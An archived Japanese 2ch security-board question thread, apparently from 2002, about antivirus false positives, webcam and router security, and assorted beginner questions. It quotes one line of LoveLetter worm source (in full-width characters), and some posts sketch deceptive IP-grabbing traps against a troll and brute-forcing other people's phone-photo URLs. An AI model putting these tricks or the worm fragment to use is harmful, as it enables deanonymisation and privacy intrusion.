520 名前：名無しさん＠お腹いっぱい。 投稿日：02/07/04 21:15
http://tmp.2ch.net/test/read.cgi/download/1025717301/191-201]

ニュー速で見つけました。２ちゃんのスレなんだけど、踏むと感染するって言われました
踏んでしまった｡･ﾟ･(ﾉД`)･ﾟ･｡

521 名前：名無しさん＠お腹いっぱい。 投稿日：02/07/04 21:19
>>520
しません
どこぞのｷﾁｶﾞｲが、197のvbsのソースにセキュリティソフトが反応したのを
ウィルスに感染したーとかほざいてるだけだから。
つかみりゃわかるっしょ。んな情報に踊らされるのは
ノートンに踊らされて騒いでるｷﾁｶﾞｲと同レベルだぞ。

529 名前：名無しさん＠お腹いっぱい。 投稿日：02/07/04 21:40
VBS.Internalというのに感染しているみたいですけど、
どんなウィルスですかおせーてくらさい。
おながいします


530 名前：名無しさん＠お腹いっぱい。 投稿日：02/07/04 21:42
UZEEEEEEEEEEEEEEEEEE
またﾀﾞｳｿ板からかよ
ウィルスにかかってねーからもうくんな。

みなさん、お騒がせしました。他所の板で貼ってあった為
いち早く皆に知らせようと焦った次第でしたので
なにとぞ厨房ぶりをお許し下さい。有難うございました。

ノートンがデフォでhtmlまでウィルス検査すんのって、何か意味あんのかなぁ・・

ｳﾜｧｧｧﾝ!

>>541
表示されたらラッキー、表示されなかったらアンラッキー

Nimdaって今までどれくらいのマシンが感染したんですか？

地球の総人口の2倍くらい

>>543
そりゃもうビックリするほど沢山。今でも飼っているﾔﾂ
テンコ盛り。

>>543 ここで調べろ。ただしあくまでも一会社の推計だ。正確な数は誰も
わからない。
http://www.trendmicro.co.jp/virusinfo/vreport.asp

525 ：名無しさん＠お腹いっぱい。 ：02/07/05 03:10
糞tokはうｐろだに最高！
http://www56.tok2.com/home/apuro/


526 ：名無しさん＠お腹いっぱい。 ：02/07/05 06:47
>>525
ttp://www56.tok2.com/home/apuro/cgi-bin/source1/sourcelog.txt
ttp://www56.tok2.com/home/apuro/cgi-bin/source2/sourcelog.txt
ttp://www56.tok2.com/home/apuro/cgi-bin/source3/sourcelog.txt
まる見〜え♥

教えてください！
友人の話なんですが、Ｎｉｍｄａ＆Ｋｌｅｚに感染して、ＯＳを新規インスト
し直したんですが、たまに勝手にＰＣが立ち上がってるときがあるらいしんです。
これってどういうことなんでしょうか？

>>548
マザーボードの設定によるものでは？
LAN経由とかモデムで起動できるような設定にしてない？

設定はマザーボードごとに異なるから、
マニュアルをよく読むべし。

ちょっと気になったんだけど...
TAによっては、サポートなんかに電話すると遠隔?でTAの設定確認とかしてく
れちゃうメーカーとかあるじゃん。
あれって、一般回線で外部からモデムなんかでTAにダイヤルアップして接続
してATコマンドを送って確認してるのか???
してるわけなんか

してるわけなんか

気に食わない奴のIPを偽サイトを作って晒そうと思っているのですが
Visitor Checker 3ってアクセス解析ソフトはIE6でも作動するのですか？
自分のサイトで試してみたんですけど、どーもまともに動かなくて....

ＴＡでそんなのがあるんですか。
確かに友人の家はＩＳＤＮなんで、ＴＡ使用してるんですけど・・・
マザーの設定しらべてみます。
ハード的な故障でそういう現象になることってありえるんでしょうかね？

>>553
＞ハード的な故障でそういう現象になることってありえるんでしょうかね？
無きにしも非ず。

まぁ多分こっちだと思うけど。
http://www.google.co.jp/search?q=cache:uOGk4Pgta2QC:www.tegara.com/supports/faq/faq_general.htm+%E5%8B%9D%E6%89%8B%E3%81%AB%E8%B5%B7%E5%8B%95+%E3%83%9E%E3%82%B6%E3%83%BC%E3%83%9C%E3%83%BC%E3%83%89&hl=ja&ie=UTF-8&inlang=ja

気に食わない奴のpppなipアドレス晒して馬鹿にされるのは貴方だと思いますが

実際、ネットにも接続しながらサポートにもTELしてた訳よ。
そしたら、確認しますのでって契約番号聞かれて..しばらくすると、
すいません繋がらないのですがといわれたんで、ネット接続を切っ
たら具体的に設定間違ってるよといわれたのよ。

別にTAにダイヤルアップしてる感じもなく無音なんだ。
なんか怖い...

ルータもこの頃は電話帖で番号登録できるやつとかあるけど
ローカルならパスなしで見られちゃうんじゃないの??

ありがとうございましたm(_)m
またいろいろ試してみます。たぶんマザーの設定の方ぽいですね。
助かりました！！

>>555
>気に食わない奴のpppなipアドレス晒して馬鹿にされるのは貴方だと思いますが
なんでですのん？
IP晒されたら結構ビビりません？

>>552 作者に聞くのが筋。シェアウェアなんだから。
しかし、漏れも>>555に禿胴。

気に食わない奴ってのは荒らしでちょっとでもビビらせれば
荒らし止むかなーと思いまして

>>558 ビビりません。ビビるのは厨房だけ。

あ、どーもお手数かけました

>>558
どーかなー？びびる人は限られてると思うよ。

>>558
相手が君と同じレベルの「IP厨」なら、たしかにビビるかもな。

荒らされるのは、開設者の対応にも問題あることが多い。
オマエの言動見てると荒らされそうな感じだよ(w

荒らしならそのプロバにメールすりゃいいだろ
＞IP晒されたら結構ビビりません？
全然。
まあ超が付くほどの初心者ならビビるかもしれないが
確実に厨房扱いされるのでお勧めできない。（無意味だし）

>561
その荒らしめちゃ厨房なんすよ
特定のコテハンに粘着してレス全部読んで
個人情報を集めてコピペしまくってるんです
前にも数回IP抜かれてそこのプロバに直接文句を言ったら
しばらくおとなしくなったんです。
前はものすごく単純な方法でIP抜けてたんですけど
最近厨房なりに学習してきちゃって（笑
串の使い方もわからない奴だったんですけどね

>>565
開設者は西村ひろゆきです

へ？
2chでどうやってアクセスログ取るつもりなんだ？

>>567
プロキシ規制した方が早いと思うよ。
そんでも荒らされたら、そいつのプロバイダにログを提出して警告してもらう。

そのほうが余程有意義だと思う。

昔一回ソース見ればIP出る掲示板に誘導したら
見事に引っかかってくれました

あ、2ch内の話だったンスね。

>>569
コテハンに粘着してるので、そのコテハンの情報が載ってるサイト
って嘘を付いてIP抜きのトラップのUrlを貼ろうと思ってるんですけど

>>573
2chがログ開示しないのに
どうやってひっかかったﾔｼのIPと粘着のIPを照合するつもりで？

>>573
姫野ひみこしゃんにでも相談しろ

誘導には１００％引っかかるキティなんで
トラップのサイトで訪問者のIPを抜ければ（串も貫通させて）
成功するんですが....
でもちゃんとしたアクセスログの解析って有料ばっかりなんですよね.....

粘着するのは勝手だからな。荒らし行為がひどい場合はまめに削除依頼
してあとは批判要望板http://kaba.2ch.net/accuse/で報告。
>>574剥げ胴

>>574
以前にも数回IP抜いたことあるのでその荒らしが住んでいる
地域は特定されてます

>>578
貴方の目的を再確認させてください。

>>578 荒らしは２ちゃん運営サイドに任せろ。
「荒らし」っていうけど実はアンタがそいつに叩かれてるだけなんじゃないのか？
本当に荒らしなら板住人で協力して対処すべし。

>>557
削除人がほとんどこない隔離板なので
削除依頼がまったく追いついていないんです
って２ｃｈの管理体制の愚痴をここで言ってもしょうがないですね
今回の件はそのキティに粘着されてるコテハン達が協力して
進めてる自衛策なんです

放置でいいじゃん
下手にかまうから、調子に乗るんだよ

串も貫通させてとかアクセスログ有料とかわけわからん事ばっか言ってるけど
telnetとかsmtpとか別ポートで接続させて
生IP抜くcgi程度は書けてそんな事いってんだろな？
できるならこんなとこで聞かんでさっさとやってみればいいだろう。
何を聞きたいのかようわからんが。

>>581
削除人が来ないのは隔離板だからではなく、依頼方法に問題があったり
する問題板だからだ。

これを機会に2chを引退したらどうか？

(´-`).｡oO（なんかその板レベル低そうだな・・・）

>>579
じゃーまずそのキティの荒らし方について
僕が居る板はコテハン煽りが激しいのでみんな地下に潜って
雑談しているんです。そこなら煽られる心配もあんまりないし、
雑談で他の人に迷惑係りませんよね？
でもその荒らしはその地下スレを全部チェックしていて、
個人的な情報をコテハン別に集約して、たまると一気に
コテハン煽りスレッドえを立てて、上げ続けるんです。
たとえば、どこに住んでるとか、仕事は何かとか、趣味は...
と言った具合です。
そしていろんなサーチエンジン使ってそれに該当するような
名前を集めてきて、そこら中にコピペして来るんです
実際実名を張られてたコテハンもいます（否定をしなかったので幸いばれませんでしたが）

>>586
キチガイ隔離板と呼ばれてます

まー僕はもともとネットのセキュリティ詳しくなかったので
今はそのために勉強始めたばっかりなので
ここでは質問する資格すらありませんね

コテハンスレッドは削除対象だろ。
サーチエンジンに引っかかるのは公開している情報だからだろ。
２ちゃんのコテハンと自分のサイト等でのハンドルが同じだったり
個人情報につながるカキコを２ちゃんでやるからそうなるんだろ。
コテハン使ってもカキコをうまく吟味すれば個人が特定されることはない。

>>587
あなた方は、自ら地下スレに個人的な情報を書き込んでいるんですか？

んだからさぁ
2chの運営側がIP開示しなかったらさあ
IP抜きするにしたって
それが証拠になんねーわけよ
そのIP晒してビイる程度のド厨房ならそれでいいけどさあ
それプロバに提示したって対処取ってもらえないんだから
アク禁要望スレにでも状況書き込んで
運営側がなんとかするの待つしかねーだろうと。

リモホから地域は割れてるって
その都道府県には何万人くらい住んでると思ってんのよ

>>591 セキュリティ云々以前の問題だね。

>>591
自分で住所とか電話番号書いたりはしてません
仕事内容とか、研究内容だとかで個人特定が容易な板なもので...
具体的な名前を出さなくても消去方でどんどん特定できる範囲が
狭まって行くんです
雑談止めろ、といわれればそれまでですけど
コテハン止（もしくは２ｃｈ）やめるしかなんですかねぇ？

>>590
スレッド名に堂々とコテハン煽りの文句があっても削除されません
削除申請しても、です
昔はこまめに削除していただいてましたが、
最近はどうも削除人が居ないんじゃないかと思うぐらいです...

＞仕事内容とか、研究内容だとかで個人特定が容易な板なもので...
＞具体的な名前を出さなくても消去方でどんどん特定できる範囲が
＞狭まって行くんです
>>591はまさにそれをやるから問題だと言ってるのが読めないか？

>>594
いっそのこと自分で掲示板を作ったら？

>>592
ある特殊な事情で数百人の中の一人だと言うことは
判明しています

>>597
それをやって何も気にせずに好き放題しゃべっていたら
Googleの検索に引っかかって、痛い思いをしました。
２ｃｈでのコテハンをその個人サイトでも使ってたのが馬鹿でした。

>ある特殊な事情
そういう内輪の問題がからむのなら、あなた方の属する閉鎖社会内で解決
してください。

どういう事情だよ

女の子の事情

>>599 常識のない人たちなのね(w

真昼の情事

もうこの板のスレの趣旨とはまったく離れて来ましたね
それでは削除依頼か批判要望に逝ってきます
質問に答えてくださった方々ありがとうごさいました

彼女と私の事情〜♪

>>605 いままでそういう対処の仕方をしていたなら削除人も相手にしなく
なるだろうし、批判要望板でもあしらわれるだろうね。

団地妻のアブナイ事情　燃える四畳半

厨房板は存在する…

　ﾀﾞｳｿの例のスレで警察から電話があったという書き込みが........
これはトロイの被害にあった人がプロバイダに相談→侵入者の
IP割り出し→通報→警察から電話ということなんでしょうか？
　電話があること事態なんかぁゃυぃのですが、実際はどうなんでしょうか？

ネタだから厨房は相手にしないでよし

トロイ使って何かしらした奴も十分厨房だと思うけど
どう間違っても不正悪禁法にかかるし

　　　　　　　　　　　　　　☆ ﾁﾝ　　　　　ﾏﾁｸﾀﾋﾞﾚﾀ〜
　　　　　　　　　　　　　　　　　　　　　　　　　ﾏﾁｸﾀﾋﾞﾚﾀ〜
　　　 　 　 ☆　ﾁﾝ　　〃　 Λ＿Λ　　　／￣￣￣￣￣￣￣￣￣￣￣￣￣
　 　 　 　 　　ヽ　＿＿_＼（＼・∀・）　＜　　ﾄﾛｲ厨のﾀｲﾌｫｰ祭りまだ〜？
　　 　 　 　 　 　 ＼＿／⊂　⊂＿ )　　 ＼＿＿＿＿＿＿＿＿＿＿＿＿＿
　　 　 　 　 　 ／￣￣￣￣￣￣ ／|
　　　　　　　　|￣￣￣￣￣￣￣|　 |
　　　　　　　　|　.佐賀みかん.　 |／

>>612
なぜ不正アクセス防止法に引っかかる？

ｃ．Ｃｏｐｙ（ｄｉｒｓｙｓｔｅｍ＆”ＬＯＶＥ−ＬＥＴＴＥＲ−ＦＯＲ−ＹＯＵ．ＴＸＴ．ｖｂｓ”）
↑
わざと全角で書いてあります。
2chもふくめ、これが半角でかかれていると、ウイルスチェッカーでひっかかる

なんですか　これ

はぁ・・・

（;´Д｀）ﾊｧﾊｧ

>>615
なに使ってだよ！
そんなの欠陥品じゃん。

( ﾟДﾟ)ﾊｧ?

使ってる人の頭が欠陥品

汚染を除去しました。

　 ∧__∧　　／￣￣￣￣￣￣￣
　（　ﾟρﾟ ）＜　　あうあうあー
　（つ　　つ　＼＿＿＿＿＿＿＿
　｜　 っ|
　（_＿）__）　　

　　|_∧
　　　|ーﾟ)　ｷｮｳﾊ､ｲｼﾞﾒﾙﾋﾄ･･･ｲﾅｲ････
　　　|⊂ 　　ｵﾄﾞﾙﾅﾗｲﾏﾉｳﾁ
　　　|

　　　　　　♪
　　♪
♪ 　∩ ∧_∧　　　ﾊﾆｬ､ﾆｬﾝ
　　　ヽ (*ﾟーﾟ)　　　ﾊﾆｬ､ﾆｬﾝ
　　　　ヽ ⊂ ヽ　　　ﾊﾆｬ､ﾆｬﾝ
　　　　 Ｏ-､　）〜　　ﾆｬﾝ
　　　　　　　U

　　　　　　　　　　♪
　　　　　　　♪
　♪　 　 ∧_∧　　　ﾊﾆｬ､ﾊﾆｬ
　　　　 　(*ﾟワﾟ)⊃　 ﾊﾆｬ､ﾆｬﾝ
　　　ヽ⊂　　丿 　　　ﾊﾆｬﾊﾆｬ
　　　 ⊂ _ 　/　　　　ﾆｬﾝ､ｼｨｰ!!
　　　 　　 し

　　 　 　 　 　 　 　 Λ＿Λ 　 ／￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣
　 　 　 　 　 ﾊｧﾊｧ　（* ´Д｀）＜ｵﾅｰﾆの途中だから邪魔しないでくれる？
　　 　 　 　 　 　 ＿ （||||__⊂)__ ＼＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿
　　 　 　 　 　 ／旦／三／ ／|
　　　　　　　((|￣￣￣￣￣|　 | ))ｶﾀｶﾀ
　　　　　　　　|愛媛みかん|／

>>623
死ね

　　　　　　　　|　すみません
　　　　　　　　　|　となりでワッショイしてもよろしいですか？
　　　　　　　　　＼＿＿＿　 ＿＿＿＿＿＿＿＿＿＿＿＿
　　　　　　　　　　　　　　　∨

　　　　＿＿∧＿∧＿_／■＼＿＿＿_
　　　　|　　（ ；´∀｀）　（´∀｀　）　 　 　.|
　　　　|　　（　　　　） ⊂　　　　）　　　　|
　　　／￣（　（ 　（ ￣（　（ 　（　￣￣／|
　　　||￣ （＿（＿）￣（＿（＿）￣￣||
　　　　　　　 ∧
　　　／￣￣　 ￣￣￣￣＼
　　　|　（エッ！！）　　　　　|
　　　|　 ど、どうぞ・・・・　　 |

　　　　　　　　　おにぎりワッショイ！！
　　　　　＼＼　 おにぎりワッショイ！！　／／
　　　　　　 ＼＼　おにぎりワッショイ！！／
　　　　　　　　 　 +　　　　　　　　　　　　　+
　　　　　　　　　　　　　+ ／■＼　　+
　　　　＿＿∧＿∧＿_ （´∀｀∩）＿＿ +
　　　　|　　（´∀｀； ）　 （つ　　丿 )） 　|
　　　　|　　（　　　　）（(　（　ヽノ　　 　 .|
　　　／￣（　（ 　（ ￣￣し（＿）￣￣／|
　　　||￣ （＿（＿） ￣￣￣￣￣￣ ||
　　　　　　　 ∧
　　　／￣￣　 ￣￣＼
　　　|　 ・・・・・・・・・　 |

――――――――――――――
мафия！мафия！
＿＿　 ＿＿ .ｒ――――――――
　 　 ∨　　　｜антисемитизм,　антифашист　ский！
日　凸　�U　｜　＿＿＿＿＿＿
≡≡≡.≡≡｜ /〃∧＿∧　　 ／￣￣￣￣￣￣
　�U　∩　［］ ∨％<｀Д´|||；> ＜･･････････？？？？
＿_［|""|］＿_.［|"""|,］＿　　 ）_　＼＿＿＿＿＿＿
日< """,>　 < """ †>□
― / 　 | ― （　 　 ┃）―――
＼(＿_.ﾉ　 　 ━┳━)
　━┳━ 　 └ ┃―･゛

ﾋﾞｸｯ. ∧ ∧ ∧ ∧　　 ／￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣
　 Σ(ﾟДﾟ；≡；ﾟдﾟ) ＜　うお！なんかすごいところに迷い込んじまったぞｺﾞﾙｧ！
　　 　 ./ つ　つ　　　　＼＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿
　　〜（＿⌒ヽ　ﾄﾞｷﾄﾞｷ
　　　　 )ノ ｀Jззз

お騒がせしました。

回しか。

回さないと新しく来た人がまたウィルスだと騒ぐ。

ID/PWを入力してログインしたサイトでリロードすると
「情報を再送信しないとページを表示できません」
という、情報の再送を促すダイアログ出ますよね。
これを出さずに自動的に再送する方法なんてありますか？

>>635
ありません。セキュリティの意味が無くなってしまいますから。

>>636　ありがとう(T_T)

昨日２ｃｈのトップを開いて、接続したまま放置してあったのですが、
突然「ウィンドウは、表示中のWebページによって
閉じられようとしています。このウィンドウを閉じますか？」
なるメッセージが出てブラウザを閉じさせられました。
で、心配だったのでトロイをオンラインスキャンしたのですが、以上無しでした。
しかし、先ほど接続した直後にまた同じメッセージが表示されてしまいました。
ＡＤＳＬを使ってます。
これはどうしてでしょうか？教えてください

ノートンがこのスレのログでVBS　LOVELETTER　Aを検出したみたいなんだけど・・
どうしてだろう。どこかに仕込んであるの？

>>639
http://pc.2ch.net/test/read.cgi/sec/1025872269/

>>639

多分 >>621 に反応している。

教えてくれてありがとう〜。やっぱいたずらだったのか。
ウイルス情報見てもなんか違うし、変だなと思ってたのよ。

教えて下さい。
今突然、ウイルスに感染しました
という表示がされて、とりあえずOKで閉じたんですけど
スキャンしたら感染１　と出ました。
あの、私は何をしたらいいのでしょうか？

>>643
ウイルス名が分からないので何とも言えない。

が、２ちゃんを見ていて出たのならば、>>430を見ることを勧める。

>>643
リンク先修正。
>>640

教えてください。
今突然、初心者が感染しました。
というレスがされて、とりあえずF5でリロードしたんですけど
ウィルス名も書いてませんでした。
あの、私は何を答えたらいいのでしょうか？

>644
ありがとうございます。
今見たのですが・・いまいち理解できません（汗）
ただ２ちゃんに書き込んだだけで、誤操作があるということでしょうか？
ウイルス名はラブレターと書いてありました。

>>646
答えるのに必要な情報を聞き出せるよう、それとなく振れば善し。

>>647
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

部屋に防犯用のネットワークカメラをつけたんですけど、
仕事関係の知り合いの人につけてもらったんですが、
その人はちょっと気持ち悪い&いやらしい人で。
ＩＰアドとか全部知ってるので、部屋での生活を見られてそうで怖いです。
自分が部屋にいるときはレンズに紙を張って見えなくしてありますが。。。

侵入を防ぐのにいい方法を教えてください。

思いっきりスレ名にも誤反応って書いてあるじゃないか。
・VBS.LoveLetter.A
↑
これだろ？問題ないよ。　

今スキャンが終わって
ウイルス名はVBS Loveletter A
でした・・

どうでしょうか？。。

>>650 固定IPなのか？

>>652 ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/ へ

>>647
ノートン先生が病原菌を見付けました。しかし、それはウイルスコード(ウイルスの仕組みなど)が書かれていたから反応しました。
一応ノートン先生は安全の為警告を出しました。


とりあえず、あなたのパソコンは感染していないので安心してください。
ノートン先生が過敏に反応してしまっただけです。

＞６５１
ありがとうございました・・

>>653
そうなんです

>>657
ネットワークカメラの画像をどうやって外部から見るんだ？

カメラにＩＰアドが振ってあって、アクセスしたら見れちゃうんですよね。
よくわからないんですけど。

>>659
自分で見れないものを何故設置しとくんだ?

スイッチ付きのコンセントを間に挟んだら済むと思うけど。

webブラウザでhttp://IP address/して見るんなら、
PCにNIC1枚足してプロキシ置いて
プロキシへのアクセスとプロキシのパスワードで制限するとか。
カメラにもパスワード認証が付いてそうな気もするけど。

>>659 さん
自分でもみれるんです。
外出先からも。

>>662
そのWebカメラには参照履歴の表示とか無い?

しかし、そういう不安感を持つ相手に良くPC設定させるよなぁ…
トロイの木馬とか仕掛けられてたらどうすんだ。

>>662
ネットワークカメラの製品名とネットワーク構成は？

>>662
いろいろ仕掛けられていてメールなんかも丸見えだろうな

取引先が、福祉関係の防犯カメラとかを扱っているとこで、
ストーカー被害にあって、旅行中に盗聴器を仕掛けられたことを話したら
また部屋に入られると危ないから付けなさいって言われて。。。
付けなさいって、カメラを準備してくれた人にさっき話をして、
注意することになったんですが。
ＡＤＳＬやプロバイダーもそちらの会社で手配してもらってるもので、
その怪しい人は私のＰＣのありとあらゆる設定を知ってるわけです。
どおしていいかわからないです。
ＰＣ買ったほうがいいのかな？
でもそれもきついし。
機種はＣＡＮＯＮです

661さん！
詳しく教えてください！

ネットワークカメラの(具体的な)製品仕様が
わかんないとどうしようもない。
で、後、ネットワーク構成(モデムかルーターか)と
手持ちのアイテム(自宅に電源付けっぱなしのPCが1台あるか、とか)。

>>667
スイッチの付いたタップをカメラのコンセントと壁のコンセントの間に挟む。
で、居るときはオフ、出かけるときにオンにする。
わざわざ目隠ししなくてもスイッチ一つ、指一本になって楽チンになる。

USBポートから電源取ってたりして。

ノートンのアンチ・ビールスを入れています。
先ほど２ちゃんねるのあるスレッドを読みこんだところ、このようなメッセージが出ました。

「修復できません。
　Norton Antivirusはウィルスまたはその他の悪質なコードをファイルから除去できませんでした。
　ファイルはまだ感染しています。修復できない原因は損傷しすぎているか。または
　ウィルス定義が最新でないためこの問題に対応できていない可能性があります。

それで推奨どおりに「感染ファイルを検疫する」を選択しました。

こういう場合、このまま私は何もせず、放置しておいて良いのでしょうか？
ウィルスチェックをしたところ、「VBS.Love Letter.A」という名称のウィルスのようです。

>>667
http://www.x-zone.canon.co.jp/WebView/product/vbc10/
これでええんだろうか？

661の後半の詳細
ネットワーク図
インターネット <-> ルーター <- ストレート -> NIC1-PC-NIC2 <- クロス -> カメラ

ルーターとカメラを繋いでるケーブルを抜く。
外出時用とは別に自宅にPCを1台置く。
PCに2つのNIC(LANカード)を挿して1つはルーターと
カテゴリー5「ストレート」ケーブルで繋ぐ。
もう1つはカメラとカテゴリー5「クロス」ケーブルで繋ぐ。
ルーターと繋がってるNIC(NIC1)のIPアドレスをルーターからDHCPで取得にする。
カメラと繋がってるNIC(NIC2)のIPアドレスを手動で設定する(i.e. 192.168.1.1)。
カメラ側のIPアドレスを手動で設定する(i.e. 192.168.1.2)。
カメラにアクセスできるアカウントを作りパスワードを設定する。
PCでHTTPプロキシサーバーを立てて利用者、アクセス先を制限し、
キャッシュはしない。
PCでパケットフィルターを動かせて、IPアドレス(出来ればポートも)を制限する。
出先 <-> NIC1 NIC2 <-> カメラ
プロキシサーバーで指定したポートをPCにそのまま流すようにルーターの設定をする。
(DMZとか何とかで設定する)
出先からカメラの画像を見るときはブラウザの設定でプロキシのアドレスに
自宅のグローバルIPアドレス(ルーターの外向きのIPアドレス)、
ポートにプロキシサーバーのポート番号を入れる。
後は、ブラウザからhttp://カメラのIPアドレス/で出先からも見える。
このままでは恐らく他のページが見えないので、
他のページを見るときはプロキシの設定を元に戻す。

但し、出先が会社内などでプライベートなプロキシサーバーを
介さなければいけない場合、この方法では見れない可能性大。
でも、やる事自体は割と楽なんじゃなかろうか。
後はお好みでNIDSを入れてルーター <-> PC、
PC <-> カメラのネットワークを監視するなり、なんなり。

>>670
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

>>668さん
えと、ネットワークカメラは
「webブラウザでhttp://IP address/　」
ってやつです
ＶＢ-Ｃ10です

ネットワーク構成はＡＤＳＬのＭＮってモデムに
カメラをブロードバンド・アクセス・ルーターを使って繋いでます。
使ってるとき（一日10時間程度）は接続しっぱなしで、電源はつけっぱのときと、切る時でまちまちです。

履歴表示ってほとんどのものについてるんでしょうか。


>>669さん

USBポートから電源取ってたりして

ってどうゆうことなんでしょうか。。。？

最近変なメールと一緒に
Content.scr とか　width.scr,
Src.bat,Valign.exe なるファイルが送られてくるんだけど
これって何ですか？

さぁ。 見た事ないけど。

>>673
取り敢えずカメラのアクセス制限しときなさい。
http://www.x-zone.canon.co.jp/WebView/product/vbc10/faq/03.htm#04
今の時点でパスワードの要求が無いなら、
同じ事をすれば誰でも見られる。

>>674
スクリーンセーバーとバッチファイル、何かの実行ファイル。

それが毎日いろんな人から送られてくるんだよね・・・
気持ち悪いよ

>>673
あ、ルーターの管理パスワードも変更しないといけない。
後、プロバイダの認証パスワードと、POP3のパスワードも。

ガイシュツかもしれませんが…
あるＣＧＩを実行せずにソースをいただく方法ってありますか？？

>>674
これで解決。

>>679
ftpでログインしてgetする。

>>672
読みに行ってきました。
まさにそれです。ありがとうございました。

添付ファイルだけをどうやってサーバーで削除するんですか？

676さん
本当にありがとうございました。
感謝感激。
やってみます
。。。むづかしそうですが。。。

写メを自由に見たいのですが…ただの数字と記号の羅列に見えるし…なんかのソフト使えば簡単に見れそうです。よーするに暗唱番号分かればイーんですよね…？どなたか詳しい人教えてくださいお願いしますm(__)m

>>685
写メって何？素で分からない。

やべ・・・。俺もオジサンの仲間入り？

さっきニュー速でスレ観ようとしたら、ﾉｰﾄﾝ先生が反応しました
なんかＶＢＳ_love letterA とかでちゃってるんですけど…

>>687
http://pc.2ch.net/test/read.cgi/sec/1025872269/

写メールで正解ですか？
http://www.google.co.jp/search?hl=ja&inlang=ja&ie=Shift_JIS&q=%8E%CA%83%81&lr=lang_ja

>>688
ＴＨＸ！！
あーびっくりしマスタ。

正解です！なんとか自由に見られないものでしょうか？

>>691
写メールだか何だかの画像が、
写メール掲示板だか何だかにバシバシ貼り付けてあった。

んで結論を言うと、普通に見れたよ？

もしかして、写メールだか何だかの文章の方ですか？

http://www.docomo-caではなくて(;^_^A ソレ以外の画像です。写メールのURLを見るとパスワードみたいなのが書いてありますよね？それを見付けることが出来れば掲示板やアドレスを教えてもらうこと無く自由に見れるのではないかと…いうことです(;^_^A

ではなくて(;^_^A ソレ以外の画像です。写メールのURLを見るとパスワードみたいなのが書いてありますよね？それを見付けることが出来れば掲示板やアドレスを教えてもらうこと無く自由に見れるのではないかと…いうことです(;^_^A

ランダムに割り振られるファイル名を探したいのか、
使用される文字列をリストアップして総当たりでやれば？

やっぱり、それしかないですか…

何だ総当たりは嫌か。なら、
今の段階では真に無作為の乱数を生成することは出来ない。
だから乱数生成ルーチンと生成した乱数を文字に置き換えるルーチンを
突破すればわざわざ総当たりをしなくても良い。

スイマセン。素人なんです(;_;)パソコンを不便無く使える程度で専門知識はまったくありませんm(__)m 素人に可能でしょうか？

>>699
お前誰だよ？

>>700
おまえのママだよ

>>699
そじんには無理

>>684 そのカメラ設置者が実はストーカーってことはないのだろうか？
2時間ドラマの見すぎか…

>>552
まず、ルータでログ取れるようにするです。ルータじゃなければPFW入れるです。
telnet://自分のIPアドレス/に誘導するです。 終わり。

>>703
設置者はhttp://pc.2ch.net/test/read.cgi/sec/1012758402/1

すみません、質問です。
ルーターを導入することがセキュリティ対策になるってことをよく聞くんですが
何故対策になるんですか？

私はADSLを申し込んだ時にルータを選択したんですが、
このことは、少しはセキュリティに寄与しているのでしょうか？

◆お前ら2ch存続の危機です！！◆
http://sports2.2ch.net/test/read.cgi/wc/1025665182/
をsageてください
１は大変なことをやらかしますた
韓国民団を敵に回すとスレ主の１が訴えられるだけでなく、
2chの存続に関ってきます
ageているのは在日です、sageでお願いします

>>706
http://www.google.co.jp/search?sourceid=navclient&hl=ja&ie=utf8&oe=utf8&q=%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E5%AF%BE%E7%AD%96%E3%81%A8%E3%81%97%E3%81%A6%E3%81%AE%E3%83%AB%E3%83%BC%E3%82%BF

>>708
ありがとうございました。

汚染を除去しました。

>>710
確信犯ですか？

ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

その文字列に反応してノートンが騒ぐことをわかってて
何故ここにｺﾋﾟﾍﾟする。

>>710
てめえ二度と来るな。うちのノートンが騒いだじゃねーか。

うちのノートンもせっせと無駄働きしたみたい〜。

HDが「カンカンカンカン」と異音を発し再起動orフリーズ
しちゃいます。これはなんというウイルスなのでしょうか？

>>711-714
だーかーらー。
なんか対策があればと思って聞いたんですよ。

だーかーらー。
http://pc.2ch.net/test/read.cgi/sec/1025872269/
ここ読めってリンク貼ったんですよボケナス

>>717
了解しました。かちゅのログを消しました。そのあとお礼を書き込むためにまたこのスレを開きました。するとまたノートンが反応（以下略

わしがスパーリングパートナーやっちゃるけぇのぉ。
プログラム通り一人2Rだからね。

検索対象から外す方法とか書いてあんのに
ろくすっぽ読まないで、
何でそんな糞レス付けるかな、このおたんこなす

ナイスパンチ　ナイスパンチ
すっげー藁える

あちこちの板で、アンチウイルスが反応するような
書き込みをする例が散見されるな。
つまらんことが流行っているもんだぜ。

セキュ板への嫌がらせだろう。

「WIN.EXE.virusに感染したようです」というメッセージが
出たので、ウイルス除去ツールのサイトを調べたのですが、
このウイルス用のツールが見つかりません。こういうときは
どうすればよいのでしょうか。

>>724 何がそういうメッセージを出したのか？アンチウィルスソフトが
出したのなら、検疫なり削除なりなんらかのアクションを起こしていると
思うのだが。

>>1-725
ホワイトハットですか？

ポートが開いている＝そのポートには外部から自由にアクセスできる
→80や8080等はproxyに使われるので、これらが開いていると端末に関係無く結果的に串とみなされる
と言う認識であってますでしょうか？

>>727
少なくとも2chではね。

勿論、そのポートでサービスが動いてる必要があるよ。

>>725レ
スありがとうございます。実は、REAL ONE PLAYERというのを
インストールした時についてきた、eAnthologyなるソフトが自動的に
ウイルスサーチした結果こういうメッセージが出たのです。
で、「このソフトを購入して、再度サーチをかければ自動的にウイルス
削除します」ということでしたので、今オンラインで支払いして
もう一度サーチしてるところです。これで無事削除されるといいのですが。

>>729
そんなのに金払わなくても無料のいいのがいっぱいあるのに・・・
先にそうした重要な情報を書くべきでしたね。

>>730
うーん、「ひょっとしたらこれってぼられてるのかな？」
とはちらっと思ったんですが、背に腹は替えられぬ、ってことで。
ありがとうございました。

HDDのファイルがほとんど.zipになるウィルスって何ですか？
昨日感染してしまって、ノートンでも防げなかったんですが、
再起動したら、ブルー一色の壁紙でスタートメニューもファイルも
ほとんど開けなかったんです。
それでスキャンかけたら.zipが、どば〜っと（泣

マーシの大冒険

